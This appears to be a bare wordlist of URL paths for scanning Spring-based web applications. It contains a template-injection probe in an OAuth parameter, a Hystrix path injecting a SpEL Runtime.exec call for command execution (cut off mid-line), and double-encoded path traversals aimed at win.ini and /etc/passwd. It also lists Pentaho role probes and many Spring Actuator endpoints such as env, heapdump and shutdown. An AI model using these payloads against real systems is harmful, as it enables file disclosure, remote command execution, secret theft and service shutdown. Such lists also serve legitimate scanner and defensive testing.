/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test
/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(
/pentaho/api/userrolelist/systemRoles?require-cfg.js
/api/userrolelist/systemRoles?require-cfg.js
/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/actuator
/api/actuator
/static/link/%2e%2e/etc/passwd
/actuator/health
/actuator/info
/actuator/env
/actuator/metrics
/actuator/logfile
/actuator/mappings
/actuator/trace
/actuator/threaddump
/actuator/heapdump
/actuator/auditevents
/actuator/beans
/actuator/configprops
/actuator/scheduledtasks
/actuator/httptrace
/actuator/caches
/actuator/conditions
/actuator/sessions
/actuator/refresh
/actuator/restart
/actuator/shutdown
/actuator/flyway
/actuator/liquibase
/actuator/serviceregistry
/actuator/bindings
/actuator/integrationgraph
/actuator/heap
